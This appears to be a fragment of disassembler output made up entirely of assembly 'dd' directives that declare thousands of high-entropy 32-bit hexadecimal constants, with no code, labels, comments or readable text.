dd 574B742Fh, 0AB270D61h, 7F8A303Fh, 99356F7Ah, 3130F899h
dd 0EDCCDE14h, 67143338h, 65416176h, 966739A5h, 168EB7F3h
dd 21F92A4Ah, 0CEFFEE22h, 0AB075583h, 0C55E42E4h, 6042528Dh
dd 0FEC2BD32h, 7A2D76DAh
dd 0F8DAB245h, 7C44192Fh, 0ECF360E6h, 65624254h, 633BD2E5h
dd 2D3D7CC1h, 0D8A68ACFh, 0F5DCD1FDh, 0C5E139B5h, 0E437B34Fh
dd 51268D50h, 2D761F63h, 843B3615h, 0C0EE10Bh, 0D191B278h
dd 0E4915EBAh, 0B5E2E899h, 57B4096Bh, 0ECC3251Ah, 0EDE97C62h
dd 0C64CF79Eh, 0B5DB32ADh, 9A2ACF13h, 7EAF171Fh, 0C3210BD8h
dd 939C8E8Ah, 0D89887FEh, 94BD4CFAh, 77EDC366h, 47BA414Ah
dd 91DD8309h, 8FBCC4Dh, 38A7E64Eh, 89D39FF1h, 25066755h
dd 7E30B51Fh, 21F2ACE0h, 707E1845h, 0AB45D1A2h, 0F5EA0F0Ch
dd 37A3047Bh, 2061C621h, 0C1704FAFh, 0FCAA9DF0h, 14336B1Ch
dd 13C5080Ch, 8DF49C13h, 199E6ED4h, 7F7C323Bh, 5D007017h
dd 0FA6AD405h, 83D1F1DCh, 0EBF8BDA3h, 0FEB3D5D2h, 5BEC1FBDh
dd 0C44EE056h, 0AAEDD611h, 65C0FF52h, 1535A9DCh, 49FD99B0h
dd 1DA9D53Ah, 5A2F0625h, 7728FCE1h, 0CBA95545h, 0A0845AEEh
dd 783C7877h, 0CFE191E8h, 0CA83586Ch, 0E6629C2Fh, 942A0285h
dd 10EB8DDDh, 0C43FFD46h, 8A0E3314h, 5F1B6F40h, 0DC9987BBh
dd 3AA8ADABh, 99D79E6h, 0EB3BE01Bh, 6EE269A8h, 975CEE7Fh
dd 4A5450F6h, 3D1B2307h, 0F710D3EDh, 3CC3FFB7h, 0B2455FD3h
dd 0E249C676h, 0BA3441A6h, 0C4BB03Fh, 634CBAD7h, 9563C307h
dd 0AFE5E7E6h, 372BA53Fh, 2DBA496Ah, 0B8F2FD88h, 5D689BAAh
dd 2F43761Ah, 38753363h, 159553A1h, 30A5CD0Ch, 7837C2A9h
dd 9EB0327Eh, 2CCF536Ah, 739B1DA5h, 3861F1Dh, 0D763F32Ah
dd 0FB64B55Bh, 60575CE7h, 25644546h, 477D44F2h, 0ED36AEB1h
dd 9CF6E8CCh, 0B53B07A5h, 1AA992Eh, 1F82761Eh, 9F442DD2h
dd 5E9CE2D9h, 4780EDA1h, 4BCD0D77h, 634BF378h, 0F862B161h
dd 6BD52903h, 12996EA4h, 3DEDD7CEh, 5F91EBB0h, 0EF2AD1Bh
dd 77415D4Ah, 0E4D6BEB2h, 82BB36EDh, 0FD4ADE73h, 0C1945114h
dd 0F0A13651h, 2254558Dh, 6F60DACDh, 0E7D3EBCEh, 995A2E33h
dd 2925AC47h, 0B9B5FB2Ah, 0A9B8C629h, 259F0D58h, 5A5D8E18h
dd 0B4ED7EB0h, 0D0B5D5D4h, 1BEF5AE6h, 0EACDA2BEh, 0F227DDC1h
dd 5D68DC62h, 4A17CDD0h, 391108C3h, 3BD4F960h, 16D38358h
dd 0E803D5FCh, 288561F7h, 47F685BAh, 3D59A26Dh, 6B704830h
dd 0D5BAFF6Ah, 2BAD6EBAh, 81E81EAh, 23A87A1Ch, 0CD9C25FDh
dd 70EA3915h, 0E394AE51h, 15F85455h, 0E2AB3296h, 75439D4Fh
dd 0EF415F57h, 7B521EBEh, 8AB1079Bh, 0BAB851B7h, 0E42B6BDDh
dd 61374FCDh, 0BBFC8D36h, 227C188Eh, 0EE16CA46h, 1A5483D5h
dd 18CE5706h, 2A7695FFh, 366ED6EAh, 45BA8B5Dh, 34D2E04Bh
dd 0D40E2BBEh, 0E281FBD9h, 8C2E33AFh, 0D8BB5DA2h, 9AB8CF65h
dd 93E9B50Eh, 55D3A323h, 8FA73AD7h, 79EB563Eh, 990FE4Fh
dd 4D9C4E87h, 1FA146C4h, 0C97BBA2Fh, 1BF97308h, 47F523C6h
dd 0A7BF5C42h, 0F8565DFBh, 0C8D1DE3Bh, 495740FDh, 5DC07DE5h
dd 0F5A28693h, 0D5735D41h, 5CE3503Dh, 29C8D9D2h, 72422BEEh
dd 9E53BAF3h, 27527F33h, 7D4EB948h, 78768371h, 937AD6F5h
dd 60E25905h, 19A9BBB8h, 0C4A4BF76h, 0C3FD3308h, 0C137DC25h
dd 8EED0056h, 0DDB16738h, 1763DFDAh, 0FC2E6EA0h, 0A4D2FB4Eh
dd 942B27BFh, 3F794198h, 0BAFBE303h, 0FDAA0820h, 6EF94076h
dd 4751C3A5h, 93FD227Fh, 0E07E5727h, 0AC29A8A8h, 0ABE39EAh
dd 6F857CFAh, 4D5785D7h, 3CD56DCDh, 0BFBB4419h, 0D4CB7C0Fh
dd 9C93B4B7h, 0FCFAF9FEh, 32A85E02h, 2F2ACFD7h, 5C57731Ah
dd 4F64F423h, 35D2D131h, 0D25FA411h, 8DF6B6BEh, 0BF459939h
dd 0AE56C8C0h, 0A8A261C3h, 0B242168Eh, 5AA57F2Ah, 1883355h
dd 0AB0C61Ch, 30C7AE92h, 0D827B160h, 0CF6A3F1Ch, 0D4122B2Eh
dd 4AD05397h, 8D940C7Ch, 88645B2Ch, 0C7D6DCB1h, 53C3D467h
dd 5CC56B42h, 2DD72D72h, 8042CFC6h, 1917CCB4h, 0A50D5A49h
dd 196B322Eh, 514F34AAh, 0F7BACA8Ch, 0DCBA72B7h, 0B7834F59h
dd 0ECB94F8Ch, 230CE352h, 0A118D526h, 2DD73ACh, 3F9F1EF5h
dd 55F8D4FBh, 9E3B6DE8h, 0D38DC30h, 1C7DF317h, 0E66D8DB4h
dd 53A86D05h, 0E5BBF424h, 70486FAFh, 0FDFE4A57h, 56BB48F6h
dd 0D0EE7A52h, 0E8D72109h, 8C229CC7h, 3FC3BAE1h, 42B27C73h
dd 0EC644395h, 1D6C577Bh, 0CB6212CDh, 0A061060Eh, 0FEA74574h
dd 1610A99Ah, 0BBC4B6Ch, 0CACD3533h, 0D825F824h, 0D13681E0h
dd 0AEDE8B97h, 6090BF34h, 0B94FEEB3h, 3F0FBAC9h, 4325F135h
dd 0B27E6CEEh, 0A3D3E199h, 2FCAD4ACh, 94845668h, 0A621F0FEh
dd 3D6A4BBCh, 66357B5Fh, 0EF6A1567h, 9D622A6Ah, 5FBAA464h
dd 0E38D0705h, 770F4BE1h, 365BE614h, 0FBB04FDFh, 0B33AD65Dh
dd 5290C80Bh, 971B96FEh, 0ABD20B5Eh, 73A6631Eh, 930EFA11h
dd 4E2B20BCh, 0B75BE1C1h, 6B9FCDEAh, 705E1C8Dh, 7D30D771h
dd 0AD70269Dh, 0CF6E44B7h, 0AA2AA7F7h, 84BB69C8h, 6696CE39h
dd 0A2F76E91h, 35AA8B8Dh, 0D7226C63h, 9E1D625h, 1E4CD2F1h
dd 0FC4CAF8Fh, 0A1EAF710h, 0AB2A8B7Eh, 37C2941Dh, 0A22B0852h
dd 45085D73h, 3E4BF097h, 3988BD54h, 0D05ADED1h, 8D1EB2D6h
dd 0F21E0F07h, 0B130C094h, 0ED2BAA72h, 0F916664h, 107512A9h
dd 9647079h, 0E1E37AAAh, 0AAD0E0A0h, 0C42A8B59h, 0FAB8B9AAh
dd 1FB81D8Ah, 0F9859AA8h, 0AAB5CF17h, 0D9EE9DE2h, 2F01EC5Ch
dd 0FCF5DEE2h, 9FD9C778h, 776AC983h, 5A624171h, 0BB1E5D40h
dd 1B44410Ah, 0D65CB576h, 29DA4499h, 0CE92D265h, 9B1B32AAh
dd 79614855h, 7D45A534h, 12E4B28Dh, 6A44AA7Ch, 51FC62A7h
dd 8C95540Fh, 0B02A17AEh, 2EB499A4h, 876A526Ah, 0A8EC0C1Ch
dd 0AB8A549Bh, 0EC838C26h, 838A866Dh, 0A5C22FF2h, 0DA7BB998h
dd 6EACB8F7h, 2384597Eh, 16811CE6h, 7D3AED61h, 0C5BE906Bh
dd 0D4EE513Dh, 0D144684Bh, 54FF7999h, 181F7E83h, 0F90444BCh
dd 0E4DC0DAAh, 0DC6B8C17h, 478F7B1Eh, 62E148C7h, 4CCC55B1h
dd 0A95C2A16h, 0AD00B8F9h, 4ECA8A2Ah, 0F8C2A7AFh, 0B013E164h
dd 6EA4E2Ah, 75366894h, 0C6975D50h, 7C5EEF4h, 5BBADB66h
dd 58ABFE81h, 8F0345FEh, 0AD129F66h, 8EFBEAD5h, 19ABD575h
dd 1F8D1D72h, 0F7BEBEEAh, 0EB74C13Ah, 0AD9C989Eh, 6FB9957Eh
dd 0DEE0B461h, 0FA5283CAh, 0C55C5F77h, 396DD489h, 0F2AD0546h
dd 0BE4B8F14h, 0EF521721h, 0AF3B5CB4h, 71933211h, 0C2D11B2Ch
dd 6E3533EFh, 0F1D259EDh, 72A6B16Eh, 0BC924AAAh, 903307E3h
dd 784AEF69h, 0C0F14F50h, 0C945CB93h, 7B4F6B8h, 0F4544B13h
dd 0DCCC7855h, 0E3CC2963h, 40775F55h, 37AB142h, 338212A7h
dd 0B791AF69h, 0EB4E92FEh, 70C63E5Ah, 0DB7494AAh, 0D0BEB9A5h
dd 37FB3E4Fh, 0AF1D2D20h, 3CCD4FB4h, 5FC1C143h, 0F7E95A25h
dd 0EDA868A1h, 0BA731047h, 0CCD9E17Ah, 757F30B8h, 867C7F35h
dd 0CDCD8AACh, 5F385D56h, 7DF9A440h, 0FA959DCh, 1A319002h
dd 890CD573h, 6DBB2BDDh, 0EA115933h, 23D163ECh, 0EAC9513Bh
dd 0C0CCBF5Eh, 562F4CA1h, 0C3E02A44h, 9ADE1568h, 5ABBA9F0h
dd 17F90787h, 12A9664Ch, 7F26F1B2h, 20662818h, 0E6D771CEh
dd 4BD4E5BEh, 0F1319591h, 0DB17E8F2h, 0E4F887B0h, 7BD42863h
dd 0C649D47Ah, 15DDB234h, 0EE70CB45h, 96B42F84h, 0CD375511h
dd 46F847FEh, 0A9CFB41Eh, 62A64F23h, 99AFCE46h, 0FB447974h
dd 0F8BA3AF5h, 38109F36h, 0E605A7E6h, 0AEED5527h, 8AD58952h
dd 26EB415Fh, 0A61F4AD1h, 0BB644AFFh, 6F767347h, 67ED8F2h
dd 66233D69h, 87B3A4EEh
dd 309683CBh, 47344878h, 7623295Ah, 44960C93h, 0EE774CB3h
dd 33B1A9Ah, 0D9DF48FBh, 0DD491290h, 0BD97B39Ch, 0B830AD19h
dd 5EFF6B04h, 0E7571C43h, 0C52FD31Ch, 78E12D53h, 542DB238h
dd 0EB25157Dh, 9A988F03h, 2DD6DDFDh, 0EB4509AFh, 0B8379B0Ah
dd 13A80979h, 7FB27091h, 5AE84760h, 8D63FEACh, 7ED4492h
dd 13AD3DE6h, 4DA60EDEh, 0B39817E3h, 0ED2D5EBBh, 0ADA2535Dh
dd 46BB0E14h, 2BED36AAh, 0C3A4C51Bh, 14577323h, 0BA7DBDF4h
dd 3AD45D97h, 7CA71A6Bh, 951E8A2h, 262EFBF5h, 6C4F32B5h
dd 2C151171h, 3EF50C29h, 3034B5C7h, 953BD515h, 44F02589h
dd 0F5DCB073h, 596B0F54h, 7ACB056Eh, 4BD744EEh, 24551366h
dd 79899887h, 6BFDAB6Eh, 0D554D20Eh, 0B7094B8Eh, 9F6D266Bh
dd 41204013h, 0C4689866h, 825E8798h, 86C8F77Bh, 1A1B490Ch
dd 5E4CEB2Dh, 457DCF54h, 3115A136h, 2B201522h, 0ABB3F6DCh
dd 7D0FB4Ah, 6F563F97h, 554CCD01h, 10AF1186h, 0D1F9B7F5h
dd 486FA3D8h, 616860DCh, 1DFFEA8Bh, 4591F19Dh, 4C0FA599h
dd 70A6B7B3h, 0A3AFC26Dh, 0FE556894h, 0C6FABC53h, 0F0D798EEh
dd 88E27F84h, 0C63C9FD8h, 0E25CE750h, 0A3E35B8Fh, 0A6868C8Bh
dd 0EBAD632Ah, 0EF5F7EE2h, 0BDA8E422h, 3C0A229Ch, 2DFBFE0Dh
dd 0D67D7181h, 0F846FD69h, 9B9F2F35h, 477C5CA3h, 0FAF407B4h
dd 75DBD5BDh, 7FC64A5Ah, 0D85CEBB1h, 0A55E37D9h, 3DCF412Ah
dd 2F7C67FBh, 0D3DD81D1h, 7609263Eh, 1284D5C3h, 237FB316h
dd 0C571694Ch, 7D1DB432h, 0EED8E951h, 0AED0A945h, 7B46025Ah
dd 0CEC77B95h, 2A673F3h, 30E7AB2Eh, 0EC05ED72h, 90ECE21Eh
dd 72C79D6Bh, 0A6669BCBh, 4A1E131Fh, 837DF01Ch, 224408Ah
dd 43C6DCAh, 148A97BDh, 6C55ED21h, 162F27C1h, 77C0A7F9h
dd 0F50C43D0h, 33C171A6h, 0D8A9E5A3h, 0EE07D5D8h, 96DB944h
dd 0CBF20443h, 5D97C569h, 99343772h, 58A7B157h, 0FF15A4C5h
dd 275230D0h, 0FDCB8577h, 0AECA10D8h, 91F7364Bh, 3E05D9E4h
dd 0ECFCF5F3h, 0DE29A3DEh, 1FF9B672h, 45541B6Dh, 6F781315h
dd 95B0BA1Bh, 768F9FCDh, 57DCE68Eh, 563DFA33h, 0F4AC06D0h
dd 3D9978A9h, 23CE0C3Ah, 0C7732946h, 0DA8A5ED3h, 1254741Fh
dd 0BA04AADCh, 23183098h, 414BC003h, 685B3BC4h, 7DC510BDh
dd 457C434Fh, 730D73A9h, 8BF7A227h, 6F5425B6h, 4C6A23BBh
dd 2FFA108Bh, 7A2A4DB9h, 63BBDBC6h, 497C8835h, 15DF8626h
dd 2E8DE5D3h, 1E6E75CCh, 7801FBADh, 8DFE9E35h, 2B90B13Ch
dd 4156325Dh, 952EB19Ah, 2D4B1ECCh, 776EDEBBh, 0C0E732CFh
dd 0DC65C32Bh, 5FCA43F0h, 58314824h, 78162C83h, 9FE7523Fh
dd 0BA5E33C0h, 0A5B8C91Dh, 914F791Ah, 5F098CB6h, 0F8CFB945h
dd 0CC7CD49Fh, 0BBDF9A3h, 0F835264Dh, 76C25413h, 9602EC0Fh
dd 9DA07BEDh, 7E46DD66h, 80B372BFh, 123AB879h, 9632D77Ch
dd 8DC5A631h, 3EF4A1B5h, 0C90C9901h, 0FBE188E6h, 0DBB4ADDEh
dd 12BC5E39h, 0D8FBB8D8h, 1611504Bh, 292D6F44h, 0AF77774Dh
dd 9F4810EAh, 7CE3A8E6h, 270DBECBh, 3AD7FD85h, 599CDB76h
dd 7573AAF6h, 93EBBCB4h, 1E9A8E0Fh, 0F8785C30h, 36B7C162h
dd 0B3021F14h, 59A9D1A5h, 461F5AE3h, 91B2EB1Ah, 9585F7DFh
dd 0EA57CF7Eh, 3F0F9A7Ah, 2D0BE612h, 0C4C4C07Ah, 0F7BC6266h
dd 17175270h, 51B575F2h, 9E7E3A32h, 7F138CB2h, 62B82452h
dd 34AAE12Dh, 0ACE8073Eh, 76EF84DAh, 0FA6F6215h, 0BAD16DE0h
dd 0E54F4B33h, 8F6657CEh, 5D54CD69h, 0A938815Dh, 455C799Ch
dd 1417A056h, 47ED5E50h, 429B5CDDh, 0F88E928Dh, 945ACF21h
dd 0AF22B3B6h, 0D82A2CEAh, 0B08914C6h, 987C9E5Ah, 2181A8D3h
dd 69DBB39Eh, 7E0DF0F5h, 30DC3A41h, 0B02ED3h, 601D3C0Bh
dd 373BCAD9h, 0CBE6BE8Fh, 0FA3A81F3h, 0F5F47285h, 26EF2B91h
dd 4D3E252h, 0DC77C84Dh, 2C65AC7Ch, 0E2D7553Dh, 95FB2C8Eh
dd 5687536Eh, 0A66B8231h, 0B3BA4539h, 0CCB4ADC4h, 383361BDh
dd 53BC9656h, 3E3CEBC9h, 0DFAEA3B2h, 0FC24D79h, 0D66614ECh
dd 9CDEB53Fh, 0C2055952h, 83034D0Dh, 0A46BAA4Bh, 0B12AA157h
dd 63EEDFDh, 0ABFEB33Eh, 6F15422Bh, 0ED374188h, 5502916Ah
dd 5CDDF026h, 18D33050h, 5D796527h, 283E4A87h, 23387E3h
dd 0F273E7B4h, 0F4057FB9h, 4D2FAE5Dh, 0C6A0F330h, 6A53BD8Fh
dd 12A0CC38h, 0FE76414Fh, 0F5ABC08Ah, 9D29EA3Ah, 0B895CFE6h
dd 0E1FC3918h, 97474AA0h, 0F562CA5Dh, 0ECD432AAh, 0C55D7F66h
dd 80FA908Dh, 3537495Eh, 22D119BAh, 0B377F15h, 8E58AAA7h
dd 0A459FB0Dh, 38BDE0A8h, 6F79D636h, 1B99AAF7h, 0B294F2CAh
dd 1AB705F2h, 5A6AD6A9h, 0CDFD4248h, 47566B97h, 0E7B9A23Bh
dd 8C81B446h, 0F056DADAh, 0FEDAD9E6h, 8BBAAFA9h, 0CFE21F8Ah
dd 4A151084h, 569CD16Ah, 0A12B5C7Bh, 0B0EDAD15h, 1E4D8D5Ah
dd 707C0018h, 0D72BE68Fh, 7676A828h, 0E4CF17F3h, 0E3BB9311h
dd 3E082D3Bh, 1F2BCB79h, 3CAB8E6Fh, 0D6059F67h, 0CB41F9F4h
dd 1ED75BB4h, 607C9E45h, 2CC6D1F3h, 0E740B959h, 0A8B3B3C1h
dd 0C98ECD71h, 754F4AECh, 5E2D0C8Eh, 0D9B9F76Fh, 28C2EABAh
dd 1D8E4B5Fh, 0A0FF0C0Fh, 20A5053Bh, 83F44E73h, 0B2506556h
dd 603C0FAh, 70ADD75Fh, 1F97F305h, 0A5724398h, 77D7C6C5h
dd 8FC56009h, 0A5B76C48h, 0C3A55560h, 0C7C9CBA8h, 2344A366h
dd 0CE9775A4h, 0B94242Ch, 35892DC2h, 5A3C30FAh, 7E8CDED3h
dd 34BB863Eh, 0A8766E6h, 0B40E7745h, 127CAB85h, 0E1DA6031h
dd 35F852BCh, 1AF56B2Eh, 0A6325FADh, 265164BDh, 1ED6D87Eh
dd 95521E0Ah, 0BBC5C8E7h, 1973BBA8h, 12AFDC1Ah, 661637ADh
dd 0A1F8AC1Dh, 367793F0h, 0B842D313h, 0AB498D0Ah, 954791DBh
dd 0C1CF842Eh, 40959B21h, 0B5B8C22Eh, 0E3EF65A1h, 299A7CE9h
dd 344F18E8h, 5947538Ch, 0BE0F8F85h, 0AD56AE36h, 0E4C73E3Eh
dd 5E799F7Bh, 7D9DE1D1h, 2E60689Fh, 0C3DCA6E6h, 36AA6752h
dd 4EB187DAh, 1565D90Bh, 74248A23h, 3B5789B0h, 0D18EABD0h
dd 4C192CCFh, 8B105A2Bh, 554D9529h, 79E7A4F5h, 6D8B7529h
dd 0FD94216Ah, 0AED18FEEh, 0E9A448F7h, 0B7866698h, 0C79640B3h
dd 575670D7h, 0D04AE85Ch, 0F569A652h, 0E7E77E2Eh, 0C00A4B20h
dd 59935C3h, 8B0FCDFBh, 0B753E09Ah, 7ADD8483h, 0EFC922A6h
dd 0E6640C2Ah, 46109E5Bh, 572951DBh, 0F7924E70h, 703E8DC4h
dd 92E0C5FEh, 584C6C8Eh, 9B66EDB1h, 0BFC7F287h, 0B880E738h
dd 92BA0790h, 0EE8CD2EDh, 0B09B1528h, 9E2FAE98h, 97E5A0E2h
dd 0C2814AF4h, 95C5602Fh, 0B8E95022h, 3DFA24F6h, 8FA558F4h
dd 562B6C63h, 0D2BF39F1h, 0A33E35BAh, 6FA3825h, 41BF559Ah
dd 3B476717h, 0CDC2277Dh, 1E771D7Fh, 67B7B7DDh, 0FE7706DBh
dd 65C90AE1h, 0C0FA5118h, 4EA166A0h, 0C1DA3867h, 2414E061h
dd 0F83158D9h, 0AB5F4756h, 0DA958D0Bh, 95D8E0F3h, 0D46AB59Bh
dd 505453Fh, 0C4AA8C3Fh, 340DD52Ah, 0C8AC2E8Dh, 25BEB687h
dd 830984C9h, 65552529h, 933340C0h, 0F1C45CA8h, 7CC5DE3Fh
dd 241ADA64h, 0E514795Dh, 0F681BD4Fh, 0D0DCB478h, 3D1DADFEh
dd 2D8CE1F8h, 65C961DCh, 33A8DBBFh, 0E51A9Fh, 0FD9B8EE2h
dd 0D95BF6F4h, 0BC8F23E3h, 0F3E53C4Fh, 0BFFC4ABh, 0E3138850h
dd 5B5AD95Ah, 3ABD471h, 5A2F32FCh, 373DB52Dh, 2078BDDAh
dd 2E6BDB24h, 38621E47h, 9F0EEB87h, 4512D2B3h, 0EB593D9Eh
dd 8BBF56BBh, 8403E675h
dd 0DE5FBB11h, 0D0E609B6h, 0A46E9B5Fh, 14A7B2FFh, 0A059B1D1h
dd 0A335D954h, 394F78DEh, 6EA1AE0Fh, 41F2FAh, 68E2F873h
dd 149C8F9Ch, 742F2EE2h, 691D8AC5h, 0D5FCB9ECh, 0DABDDBE7h
dd 3B1A494Dh, 9E8C5690h, 3FB8E16Ah, 0D98CB62Fh, 61B7B388h
dd 1AA710CCh, 0DF8BDA29h, 404E42C7h, 0BFABA6A1h, 0A5066DE8h
dd 385B4796h, 9EDB7390h, 0CA333A89h, 0A4925E4h, 8653999Ah
dd 2B754577h, 142DE71Eh, 4B49887Ah, 0D7B9A53Ch, 0C0F00FC6h
dd 3561EE8Ah, 0B53FF148h, 0E346056Ch, 0AAAFA4A1h, 0F3AFA602h
dd 87FBDFADh, 0AE2A28A9h, 7334F3F7h, 0D57415E4h, 8467227Fh
dd 0F41984EEh, 58D703E1h, 0E2D9C57Ch, 41232FCEh, 940C3AF8h
dd 58E7E7BFh, 0C1A85417h, 7C34BF14h, 8787D2D6h, 0DF0E0FEFh
dd 0C732BDC0h, 0DB6FE543h, 0DDBC77A1h, 9616073Dh, 0E446CEF6h
dd 62D82A8Ch, 8F444FA6h, 711F35B5h, 39BF9F6Dh, 0DA63E0F3h
dd 0DC95AC0Fh, 42467D8Bh, 6BB9F67Eh, 5E65660Eh, 0BF5AFEB7h
dd 0A9AE7C6Fh, 9B2A1F88h, 0BE97F784h, 5C13EAA2h, 0A2B7DA6Bh
dd 3464FB64h, 0EFC26A32h, 2A3B2780h, 0A3FD985Ah, 33CC6DC7h
dd 98319B96h, 0AB352BA3h, 63443F73h, 9ECA0B44h, 9199E0E0h
dd 6064AEEh, 8D323F5h, 628C49FEh, 79CE2FB7h, 0FC1C9F5h
dd 285428A4h, 56F662A0h, 0EF15FDDh, 0A5B57286h, 511A0465h
dd 412E150Bh, 9516BDA2h, 0E889EAF1h, 3E77CA4Dh, 0E34EF6B8h
dd 1112EC8Eh, 0E68D0432h, 0D6E24303h, 1C0D6369h, 1735FC63h
dd 0D9A58722h, 4D80FDB9h, 53F533ADh, 0FD99A997h, 0B099088Bh
dd 4BB7729Eh, 0FDABE4A9h, 0A2ADFE75h, 5B48DD4Dh, 28FD43F0h
dd 2FB032ABh, 0E77EF588h, 1D30CED6h, 0D5948C53h, 4777C36Ch
dd 7A874BF3h, 36FB32B9h, 151F1763h, 96CA7F37h, 0E2C341EAh
dd 24B1DBDh, 730AF161h, 35E2576Bh, 0C6442A15h, 0AA0FF2A3h
dd 0A4C607E4h, 64583452h, 0AEF3A5Ch, 2AF50C52h, 8C867E61h
dd 6968021Fh, 0DC96C9DDh, 0BF8C96A8h, 753688F3h, 0C1B47DB4h
dd 20874B8Dh, 2AF4416Eh, 0CE4C8FBBh, 587E688Dh, 0A471BC95h
dd 132D1237h, 87BE5469h, 416F29C4h, 1CB4F077h, 0AE509A87h
dd 8FC45839h, 0BE9F162Ah, 0D757AB8Eh, 0F974892Ch, 6F925h
dd 3AB1BCF5h, 18140EDCh, 21B69888h, 540EF5Dh, 0F235896Ch
dd 0E517DD2Fh, 4AADEEEEh, 0D772C8Dh, 9D44080Ch, 31474FE9h
dd 0FE7ECD2Ch, 0AFDE9956h, 67BCC738h, 0C0D265C3h, 0D59C85BBh
dd 0B1B45FFEh, 1E19E607h, 1976A766h, 0D747ADF7h, 2562A5E2h
dd 772F5C0Eh, 7DAB592Ch, 0BFF3BF41h, 15A2DA44h, 0F1A3406Ch
dd 53DB44h, 25E561B3h, 5E6CA7F9h, 2A9BBAB2h, 0A49A7888h
dd 33F23950h, 0F262505Bh, 2E036842h, 6C6E6A61h, 7F83A7D5h
dd 324F8FABh, 0BADBB93h, 0B194E74Fh, 54D8BAC2h, 0DF73476Dh
dd 3AEE22EAh, 0C4E60B94h, 784D957Eh, 7FE38ED6h, 0B0BA347h
dd 57C3661Ch, 0D07FA6AAh, 0D9952FC8h, 0D5ADE8CBh, 8D1FC1D5h
dd 79E61B2Ch, 0AEEF9B5Eh, 463914A1h, 34DDCCFh, 0FB929599h
dd 23103B06h, 50131F5Ah, 0E666A935h, 0F0666AF8h, 3FDB4BAAh
dd 0FAF76670h, 0BE6B553Ah, 0D608C768h, 73E5ED65h, 0BC4A08E1h
dd 5643B81Fh, 0FDF87351h, 368DEB95h, 8185FE22h, 0B25642AEh
dd 5B5FD796h, 98D45A9Fh, 2B7A4AFBh, 0F1454A95h, 27E23CBDh
dd 550990D2h, 0F68F5C5Bh, 3AF64660h, 8FBD1490h, 0D4E1D2Eh
dd 0A5B14385h, 1E65EB92h, 0F59C0BB9h, 66C6E10Dh, 99F0AD5Bh
dd 3F04715Dh, 0FCA68DDh, 6ED18FA1h, 0E2AED17Fh, 5E34CA62h
dd 7767D194h, 0F35806B3h, 0F5D8A29Fh, 990BED2Bh, 9940B9D6h
dd 0C96DF73Ah, 452A5FF3h, 0DB8EFF56h, 0BB4795C2h, 0BBD6A858h
dd 0F172D2E7h, 8CC6ABF4h, 0ABCFA152h, 0BF575CB9h, 0BA1C389h
dd 157B2542h, 3215BDEAh, 160DEDBEh, 0A7375351h, 0C64F0B46h
dd 0DFB6BF5Ch, 16FF4618h, 5C0F9028h, 3C3CD11h, 0E185855Dh
dd 0F60C3F75h, 5A914675h, 0A398BC82h, 0FA06A7BDh, 551EDB9Ah
dd 4DC08976h, 8F429B0Dh, 4B068124h, 54DD61B2h, 216BC671h
dd 6A42FF91h, 4BF75746h, 0BBF1A9C7h, 0B3452693h, 0DBE6BCCEh
dd 7F99151Bh, 389CA335h, 9671BBF1h, 80FB0844h, 33ED7E55h
dd 0D574C7F5h, 0A785B44Fh, 0FE31576Ch, 56D0AEE9h, 0DB8F5145h
dd 0B4BA5A21h, 34802D0Ah, 0B06DB0F1h, 8568667Eh, 458F2C0Fh
dd 5E20DB51h, 9FC03D0Eh, 0B1DF1AB7h, 0CA76F3A6h, 0E5EA8611h
dd 0AE976338h, 0C12E3671h, 0AC66DD55h, 0FF248F32h, 51B46E50h
dd 0DA2D0F8Bh, 0F9E756FCh, 0BBC5AAC5h, 0AEACF6D2h, 6BB1FC33h
dd 2CCB21F0h, 8D9637F6h, 1B24C89h, 9B10ADF6h, 664A0653h
dd 1F887558h, 4E256512h, 0DA89D12Bh, 0F749A29Dh, 0B8E42F69h
dd 0D27575C3h, 0D5F53CBBh, 0A522CAA2h, 0D2AA010Ah, 0A3BC488Dh
dd 807DA976h, 0C84546CEh, 175BE47Fh, 1A3F2D34h, 30A673B0h
dd 0B2E2DAA8h, 488E7DEAh, 32B1635Eh, 0D5238227h, 2349454Eh
dd 28CA559Ah, 0A457EAF8h, 0E79EB949h, 9C879CBFh, 945C8C71h
dd 2D210DD2h, 69A71C19h, 0B998D68Ah, 5EDB6919h, 35FC1F04h
dd 0B9F19784h, 0D67F5E73h, 599ED0F6h, 4593C896h, 0AC4C269Ah
dd 0D2FAD220h, 0ACA65DCFh, 0F18E1D48h, 3942F617h, 0E31B5DF1h
dd 0F407525Bh, 1A93C723h, 0ACC33EB8h, 21050DADh, 0A165F13Bh
dd 2D17E0F8h, 15D20941h, 37855839h, 17D0C936h, 5502506Eh
dd 0DDEC8B4Bh, 5B5ED15Dh, 78D7FCDh, 7CF81B9Eh, 0F0F2D7A8h
dd 6E29FC12h, 0A5A95828h, 0B3CB9EF6h, 0D05B165Ah, 573E934h
dd 0E98CDB30h, 0BAC40BEFh, 959124B3h, 23C59B74h, 9F4B8BADh
dd 3F299F70h, 74B2A49Ch, 0F7AA328Ch, 1C5FD059h, 0B336E486h
dd 464E49E7h, 418FF5D1h, 0DC5225D9h, 0B53B1786h, 0F9F3A0B5h
dd 0DDDB46C7h, 169DE4D6h, 5BE8190Ah, 4C5F5795h, 980B3B38h
dd 0AD719577h, 34D781C1h, 0BB22236Bh, 0F2F166E6h, 5552A968h
dd 0F7D8A475h, 0BCF0B020h, 91725140h, 146B7EE2h, 78C1FE3Bh
dd 3F06B6AEh, 0FE344B6Ch, 0D8BB532Dh, 0C1F3AE2Ah, 3230B094h
dd 8EE609D8h, 965F4B15h, 1C22A42Ch, 656989E3h, 0FAD1EE51h
dd 5BB8FC69h, 9554035Dh, 713BA3B0h, 4257EE8Fh, 824F8FFBh
dd 8CFECD88h, 3D277636h, 1E076564h, 0ED55D2FEh, 3B93D195h
dd 7577BA2Dh, 896C49DEh, 0C0696A30h, 0AA563C72h, 1F1BF650h
dd 708B88A4h, 85FF4D6Eh, 26F62D07h, 33EEBC84h, 6A060814h
dd 370F5DDFh, 5F5B2524h, 0BEF9C644h, 0FACC8B3Eh, 5E52378Eh
dd 0AF7E38EDh, 0C8E5EA33h, 0E5FCCB12h, 48E698B4h, 0ABDA9319h
dd 387E27C3h, 0B36F261Bh, 0DABB5554h, 0ED98ED75h, 0F13A1EB4h
dd 0BD31B672h, 0EED4A9EBh, 0F5E0E59Eh, 9E8D7A56h, 1ABB595Ah
dd 0CAED9D06h, 4487B693h, 4A391DA3h, 0EB86B0A5h, 5F0D0375h
dd 6D7CEFBh, 2F93D2B5h, 6C8AD4F8h, 6D747A7Ch, 0B46C922h
dd 0BE9C41F9h, 97AE3990h, 42C6C697h, 0A2A0578Bh, 0EADC1D9Fh
